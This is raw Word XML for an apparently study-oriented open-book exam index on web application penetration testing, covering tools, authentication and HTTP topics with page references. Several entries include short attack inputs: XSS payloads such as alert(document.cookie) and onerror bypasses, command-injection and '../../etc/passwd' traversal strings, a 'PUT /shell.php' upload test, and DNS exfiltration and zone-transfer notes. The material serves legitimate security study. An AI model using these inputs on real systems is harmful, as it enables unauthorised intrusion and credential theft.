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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="00985AE1" w14:paraId="35E4774E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="15200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="309742A5" w14:textId="1B77C432" w:rsidR="00985AE1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6"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">  SEC542 GWAPT — OPEN BOOK EXAM INDEX </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18C1AA21" w14:textId="77777777" w:rsidR="00985AE1" w:rsidRDefault="00985AE1">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="15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00"/>
        <w:gridCol w:w="7500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00985AE1" w14:paraId="33A144F9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</w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="740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4800"/>
            </w:tblGrid>
            <w:tr w:rsidR="00985AE1" w14:paraId="50D243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58A86FB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A</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6EEE32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D7B244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AJAX – decouples data/presentation layers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B4.103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82BAF3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JS sends async requests; updates DOM WITHOUT page reload. Traditional spiders miss AJAX content → use ZAP AJAX Spider or Burp hidden-links option</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="22EAB0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311E1E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AJAX Spidering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B1.161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201363D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ZAP: AJAX Spider feature. Burp: looks in JS for hidden links (default ON). Exam: 'tool missed AJAX dynamic content' = needs AJAX spider</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6BA3EE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089FC0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Alert() Alternatives (XSS PoC)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B4.34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8965E1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alert(42) | confirm(42) | prompt('?','42') | alert(document.domain) | alert(document.cookie)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="342EE1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AFA9D7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Assessment Types: SAST/DAST/IAST/OAST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B1.14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B7720B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SAST=source code; DAST=running app (pen test focus—best for logic flaws); IAST=interactive; OAST=out-of-band</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="563D6E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58BD1D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 Bypass – Direct Page Access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FFF0A5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Access URLs directly without navigating site links. Found via Forced Browsing or spidering then logging off</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1FDF5C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DB2A6A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 Bypass – Parameter Tampering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9B06A0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Change Loggedin=0 → Loggedin=1 in URI. Spidering + logging off = find unprotected pages</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4BFC8F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6E1782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 Bypass – SQL Injection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2CA752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SQLi in login form → admin-level bypass. Best-case auth bypass scenario</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="355C71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325FF1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Authentication: Basic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B2.58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3B72D9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Base64(user:pass) in Authorization header. Easily decoded—MUST use HTTPS. No lockout protection</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="427DD3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6686FA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Authentication: Digest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B2.62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F906BA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MD5 hash + nonce (salt). Prevents replay attacks. No lockout. Logout = CLOSE BROWSER COMPLETELY</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6F9DC9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015C80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Authentication: Form-Based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B2.69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EA8750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Credentials in POST body. Security depends entirely on developer implementation. Most injection attacks applicable</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="63D2C4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33FBD2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Authentication: Integrated Windows (NTLM/Kerberos)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B2.65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F484D8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Windows-native. Uses negotiate header. SSO environment</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1F2CFA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7D0072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Authentication: SAML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B2.75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2AE2E2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XML-based federated identity. Assertions contain user attributes. Used with SSO</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="693616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BA2A2C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Authorization: BOLA (Broken Object Level Auth)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94B4F8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API1:2023. Access other users' objects via parameter. Exam: change ?id=123 to ?id=124</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7F2F32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B026D4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Authorization: BFLA (Broken Function Level Auth)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B3.13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727067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Access admin functions as regular user. Vertical privilege escalation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6EE61F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0AF93A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Authorization Bypass / Role Enforcement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AC1910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Horizontal=same-role accesses other's data. Vertical=lower-role accesses higher functions. WSTG-ATHZ-02/03/04</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="24FC0C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0D44D71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</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="23071B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48AD68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Base64 – Authorization: Basic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B2.58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D5578C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Decode: echo 'YWRtaW46cGFzcw==' | base64 -d → admin:pass. NOT encryption — trivially reversible</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="770052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2B7A41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BeEF (Browser Exploitation Framework)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B4.42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A1FF4D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Hooks browsers via XSS. Requires XSS flaw to inject hook.js. Dozens of browser payloads. Combines with XSS. Lab W2.12</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="66A25B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264A27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Blind Command Injection – DNS/Burp Collaborator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B3.25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9B9594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Ping 127.0.0.1 -c11 (10 sec pause). DNS query to controlled server. Burp Collaborator simplifies (free oastify.com subdomain)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4D5AB7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DA58FC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Blind Data Exfil via DNS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B3.28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389179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Prepend data to Collaborator subdomain. Max DNS label=63 chars, total=255. Use base32 encoding. Break into chunks</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="07FCA5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C30141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Blind SQL Injection – OOB (Out-of-Band)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B3.100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B7FFC3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DNS/HTTP channel. Uses Burp Collaborator. No visible response needed</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3BBA47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260247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Blind SQL Injection – Time-based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B3.99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D63E0F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IF(condition, SLEEP(5), 0). 5-sec delay = TRUE. Slow but reliable</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="10A377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45A216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Blind Username Harvesting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B2.108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0BF942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Fuzz usernames; detect via timing difference (good=hashes PW→slower), different response size/content. WSTG-IDNT-04</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6DFB1C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A20FA5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Browser Developer Tools / DOM inspection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E304CB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F12 or Ctrl+Shift+I. DOM Inspector, Console, Network, Debugger. Live DOM modification. JS execution</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="340410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58FEA3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Bruno (API tool)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B4.140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D19DB7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Open-source API client. Similar to Postman. Tests REST/SOAP APIs before sending to Burp</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="25F3C2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B04B23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Collaborator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B3.24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E3658A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Unique random subdomain for OOB detection. Use for blind command/SQL injection. Get started tab → Copy to clipboard → Poll now</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5D308A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37E6AA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Comparer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B1.62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3CEBCD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Compare 2 requests/responses. Spots subtle changes. Username harvesting: compare responses for good vs bad user</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="306B9F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A4EB71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Decoder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B1.61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8D28CA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Encode/decode/hash without leaving Burp. URL, HTML, Base64, hex, ASCII. Exam: decode Authorization: Basic header</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="391D01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BDFD08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DOM Invader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B4.114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44F813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Browser extension. Identifies DOM XSS sources/sinks. Canary injection. Right-click on page elements</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5AE065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8C8F85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Extender / BApp Store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B1.63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0ECE37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Third-party extensions. Sort by last update/rating. Install: Active Scan++, CO2, Autorize, etc.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1A34EA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DA52AC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Intruder – Attack Types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B1.56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46678C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Sniper: 1 pos, 1 list. Battering Ram: ALL pos, SAME payload. Pitchfork: parallel matched lists. Cluster Bomb: all combos. Exam: Cluster Bomb=credentials; Battering Ram=unknown field</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7D19AC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B19BEB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Intruder – Positions tab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B1.56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5B71E7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Workflow: Target→Positions→Payloads→Settings. Positions=WHERE to inject. Payloads=WHAT to inject. Marks: §§</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="467B29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D03429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Proxy – HTTP History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B1.57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11D921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All requests through proxy. Chronological by '#'. Select=see full request+response. Right-click→Send to tools</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7E7526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DF0C14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Proxy – Intercept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B1.56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8332DE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ON=holds requests for editing. OFF=traffic flows freely. Edit then Forward. Can also intercept responses</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="694DC6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F4660B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Repeater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B1.59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9F93AB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Resend+edit individual requests. Best for manual logic flaw testing. Inspector panel shows params/headers</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="12DF24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7BF8F7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Scanner – Active Scan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B2.29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AEF8C1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Sends attack payloads. Finds vulns actively. Config: B2.35. Results/Retest: B2.40. 'Add to task': B2.39</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0D565E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578E50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Scanner – Passive Scan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B2.30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9F7AA8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Always running. No attack payloads sent. Finds info in traffic (cookies without HttpOnly, etc.)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="24AB1C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456BA41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Sequencer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B1.60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D828EB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Tests session token randomness/entropy. Collect 10,000+ tokens for reliable statistical analysis. Predicts future tokens if weak</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3AAEFB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36DDEF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Site Map – Filter (most overlooked!)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B1.55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910202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Hides 4xx by default! Uncheck to see 403/404. Also hides CSS/images/empty folders. Exam: 'no Forbidden errors' = 4xx filtered</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7C4CC0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5F023F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Target – Scope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B1.53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8A1A53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MOST ESSENTIAL. Define before testing. Prevents scanning universe. Include/exclude URLs. Right-click to add</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4AC9C7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77235A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Target – Site Map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B1.54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380445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Tree view of all sites. Right-click→Send to Intruder/Scanner/Repeater. Filter bar for search</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="58099C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9FDC8B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C</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="07EB25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3C87E8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Cache-Control header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B1.99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DABEE8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Directs caching. Only GET/HEAD cacheable. Most important element: Cache-Control header value</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="759905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31D061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CeWL – Custom Wordlist Generator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B1.164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B7EABF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Ruby script by @digininja. Spiders website → unique word list. -d=depth, -m=min length, -w=output. Used for passwords. Longest sec542.org entry=getNonSensitiveAccountinformation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5855AB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A7E152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Certificate Transparency / crt.sh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B1.122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1FF406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Find virtual hostnames from issued certs. Not all certs show hostname (wildcards). crt.sh = free CT search</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4C0512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9A8991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lastRenderedPageBreak/>
                    <w:t>Cipher Suite components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B1.145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404ED0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THREE types: (1)Asymmetric key exchange/auth (RSA,DH,ECDH,ECDSA) (2)Symmetric bulk encrypt (DES,3DES,AES) (3)Hash integrity (MD5,SHA,SHA256)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="546687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99C3D7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Command Injection – blind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B3.23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9EEACC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Output not visible. Detect: timing (ping -c11 127.0.0.1 = 10 sec), DNS (Burp Collaborator), ICMP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7AEE6A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C57482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Command Injection – non-blind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B3.22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B77B88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Output visible in response. Operators: ; | || &amp; &amp;&amp; &gt; &gt;&gt;. Start with: cat /etc/passwd, id, whoami</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4451CA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76D4D5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Command Injection – separators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B3.20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73C032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; (sequential) | (pipe) || (OR) &amp; (background) &amp;&amp; (AND) &gt; (redirect) &gt;&gt; (append). Backtick or $() for substitution</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="06EE6B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0C4417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Content Discovery – Forced Browsing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B2.48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4100DC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Wordlist-based guessing of paths. ZAP DirBuster, ffuf, gobuster. Discovers unlinked content. Not same as spidering</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="07628B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3A5D5D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Content-Security-Policy (CSP)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B1.103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C0A6F7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Specifies trusted resource origins. Guards against XSS. Format: CSP: directive; directive. Difficult to configure correctly</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="09DDA5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A986A6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Cookie – HttpOnly attribute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B1.95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43755A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JavaScript CANNOT read cookie. Prevents XSS cookie theft. JS attempt returns empty string ''. Exam: 'prevent JS cookie access'=HttpOnly</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="06D012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72DD9D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Cookie – SameSite attribute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B1.96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50A4A4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Values: strict(never cross-site), lax(links ok, CSRF blocked), none(always, needs Secure). Primary CSRF defense</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="54A717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74FA18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Cookie – Secure attribute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B1.94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4F3B65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Sends cookie ONLY over HTTPS. Without it: sends over HTTP AND HTTPS. 'Protect in transit'=Secure flag</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="565CAF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947DD8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CORS (Cross-Origin Resource Sharing)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B4.111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50B1CC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Access-Control-Allow-Origin/Credentials headers. Relaxes SOP. Misconfigured CORS = data theft</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7FB07A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CBC0EB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CSRF – attack flow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58DE5A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Step1: Research CSRF flaw. Step2: Email/post forged link. Step3: Victim logged-in clicks. Step4: Transaction executes with victim's cookies</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="71CD7E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054C4D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CSRF – requirements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B5.7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F105D0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Active authenticated session + predictable params + browser sends cookies automatically + no valid CSRF token</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0987C4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384883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CSRF vs XSS difference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E6A27D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XSS uses script. CSRF uses static content. CSRF = XSRF sometimes. Both victim submits attacker-crafted request</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1FA4CC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89836F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CSRF – ZAP Generate Anti-CSRF Test Form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282668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Right-click POST→Generate Anti-CSRF Test FORM→Submit. If transaction succeeds = CSRF vuln confirmed</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="636B31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103885A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D</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="27EA9D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250341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DAST – Dynamic Application Security Testing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B1.16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9EA2DC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Running app testing (pen test). Best for logic flaws. Scanners: Burp Active Scan, ZAP, Arachni. Can't see all source code vulns</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3A4B97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EB7AD4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Database Fingerprinting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B3.111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780911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SELECT @@version (MySQL+MSSQL). SELECT version() (PostgreSQL). db.runCommand({buildInfo:1}).version (MongoDB). Error messages reveal DB type</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0B5016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109333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Database Metadata / Schema enum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B3.112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8FD5FC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MySQL: information_schema. Oracle: all_tables, all_columns. MSSQL: sys.tables. Use sqlmap --schema or manual UNION SELECT</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="56318E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A8112C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DB Info – information_schema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B3.113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4BA328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ANSI SQL92 standard. MySQL: information_schema.schemata, tables, columns. Not all vendors support it. Oracle uses all_* views</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0F39CC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62A4CD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dig – DNS query tool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B1.115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FD1D08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Best DNS client. macOS/Linux native. NOT on Windows by default. dig @server domain -t type. Types: any,mx,a,axfr,ptr. dig -x IP = reverse lookup</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="03FAAF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7707EF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dig – syntax examples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B1.116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1C3EA2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dig @8.8.8.8 sec542.org -t any | dig @ns1 sec542.org -t axfr (zone transfer) | dig -x 192.168.1.1 (PTR) | dig @ns version.bind chaos txt</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="06F514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33A698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Directory Browsing – finding/testing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B2.26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2EE9C7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HTTP 403=directory EXISTS but protected. HTTP 200 'Index of'=directory listing enabled. Apache mod_autoindex. Finding=configuration flaw</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6D24F3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31FCD0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Directory Traversal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B3.34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609B30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../../etc/passwd. Also enables LFI. WSTG-INPV-11.1. Same vuln class as LFI. Lack of path validation</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2280C1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DAF7FE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DNS – Brute Force / Dictionary Scan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B1.110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0C9A30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Supply wordlist; try $entry.example.com for each. DNSRecon has built-in wordlists. Fast (high-perf DNS servers). Finds hidden names</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="2A236B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4093CEA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DNS – Repositories: DNSDB/Dnsdumpster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B1.120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16C130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Farsight DNSDB: passive DNS from observed queries. Dnsdumpster.com: free, open source. Certificate Transparency also useful</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="5C9AD5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BD3A9E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DNS – Reverse/PTR Scan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B1.109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22A520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WHOIS→find IP blocks→PTR scan all IPs. A: name→IP; PTR: IP→name. Find virtual hosts from IP ranges</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="154BD4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B04A71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DNS – Zone Transfer (AXFR)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B1.108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C8A00C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dig @ns sec542.org -t axfr. TCP port 53. Downloads entire zone DB. Usually blocked on public DNS. Advise: allow secondaries only</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7E0E3F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9181AB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DOM – Document Object Model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CC6B4A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Programming interface for HTML/XML. Browser creates DOM tree from HTML. JS manipulates DOM in real-time. Every element=node</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="723D1A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3B5EF0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DOM – Event Handler XSS bypass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B4.84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59F103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Bypass &lt;script&gt; filter: &lt;img src=x onerror=alert(1)&gt;, &lt;body onload=alert(1)&gt;. onerror fires when image fails to load</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="01E856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D2677B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DOM-Based XSS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B4.64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7CB00B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Payload in URL fragment. Never sent to server. Source→Sink. document.URL, location.hash, document.referrer are sources</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="239D52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4946D3E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DOM Invader (Burp)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B4.114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D3B364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Identifies DOM XSS sources/sinks automatically. Canary-based injection. Available in Burp browser</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="36B83C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6570E2C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E</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="0496C6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4FB255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Encoding – URL/Percent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B4.54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1D4323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%3C=&lt; %3E=&gt; %20=space %27=' %22=" %2F=/ %3D==. Used to bypass filters. Browser decodes before rendering</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6EC6A6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73DFC5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Encoding – HTML Entities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B4.55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006C52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&amp;#60;=&lt; &amp;#62;=&gt; &amp;#34;=" &amp;#39;='. Also \u003C=&lt; in JSON. Bypass WAF/filter: encoder+browser decodes</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="427176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5E06A4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Error-Based SQLi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B3.75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D5AE0D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DB returns error msg containing data. Fastest non-blind technique. MySQL: extractvalue()/updatexml(). Group by col HAVING...</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="3D418B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15E6406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F</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4E22EF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689172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FFuF – Fuzzing tool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44A36B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Fast web fuzzer. -u URL with FUZZ keyword. -w wordlist. -mc=match codes. -fs=filter size. Forced browsing + fuzzing</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="493953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D45A28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File Inclusion – LFI (Local)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B3.32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3798D9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Includes local file via path traversal. php://filter bypass. Log poisoning→RCE. WSTG-INPV-11.1</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="52221A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7530AB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File Inclusion – RFI (Remote)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B3.36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7D0037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Includes remote URL. Allows RCE by hosting malicious PHP. Less common (requires allow_url_include=On)</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7B442F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168A01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Filter Bypass / XSS Evasion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B4.82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25D1C37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Case mixing: JaVaScRiPt:. Encoding: %3Cscript%3E. Event handlers. HTML entities. Double encoding. Nested tags</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="4A3CFC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1CEF3D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Forced Browsing vs Spidering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B2.48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B6E1C3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Spidering=follows links. Forced Browsing=guesses paths from wordlist. Combine both for complete coverage</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="50AB14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0B2130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Fuzzing – Burp Intruder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A90D0E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Four modes. Pro version unlimited; Community throttled. Sniper=1pos/1list. Battering Ram=all pos/same. Pitchfork=parallel. Cluster Bomb=all combos</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="27F5F4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4E3299A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Fuzzing – response analysis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B2.22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63E880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Look for: different status codes, different byte length, timing differences, different headers, error messages. Baseline first request</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="721303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1A0595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Fuzzing – ZAP Fuzzer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F8FFE1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Right-click→Attack→Fuzz. Add position→Add payload. Professional grade since ZAP 2.4. Fast. Many built-in payload lists</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="74D558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5E86CF8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G</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="1878D3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79EA51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Google Dorks / GHDB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B2.27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C2F2A5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site:, filetype:, inurl:, intitle:. Google Hacking Database (GHDB). Passive OSINT. Finds exposed config files, cameras, etc.</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="43078D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E4B4C2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lastRenderedPageBreak/>
                    <w:t>gowitness – screenshot tool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B1.133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9B655D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Sensepost tool. Takes website screenshots. CIDR blocks, Nmap results, single URL. Golang=portable. Reporting server</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="7BEA6B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13BAAF7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H</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="355A26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B2DF69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HSTS – HTTP Strict Transport Security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B1.102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D58DE6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Forces HTTPS after first visit (TOFU). max-age=31536000 (1yr min). includeSubDomains option. Even http:// typed→HTTPS used</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="24F041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E7E6FB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HTML Injection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38F8BB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Inject arbitrary HTML. No JS needed. Goal=render attacker HTML in victim browser. Fake login forms, defacement. WSTG-CLNT-03</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="41BE86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01835A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– Cookie header (request)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B1.92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BCF10A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Sent BY client to server. Contains session identifiers. Server sets via Set-Cookie response header</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="08CCAD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54DC48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– GET method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B1.78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379F58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Params in URL. Logged in server logs, browser history. No body. Safe+idempotent. SENSITIVE DATA RISK in URI</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="777E0F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F34A46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– HEAD method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B1.84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1940B3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Returns only headers, NO body. Safe+idempotent. Exam: check HttpOnly cookie flag without full page download</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="507AF4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A208EA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– Methods overview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B1.77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E0E2A5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GET, POST, PUT, DELETE, HEAD, OPTIONS, TRACE, PATCH, CONNECT. All general-purpose servers must support GET/HEAD</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="692372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8034C8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– OPTIONS method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B1.87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19C02C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Server returns all supported methods. Like asking 'what do you have?'. DELETE=405 if unsupported. Bogus method=501</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="6E922B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FE962D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– POST method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B1.80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780ADA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Params in body. NOT logged by default. NOT visible in URL. HTML forms. Requires Content-Length when body present</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00985AE1" w14:paraId="343B9A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89C56F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– PUT method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B1.89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0C1573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May allow file uploads to webroot! REST: create/replace. CRITICAL finding if enabled on web server. Test: PUT /shell.php</w:t>
                  </w:r>
                </w:p>
              </w:tc>
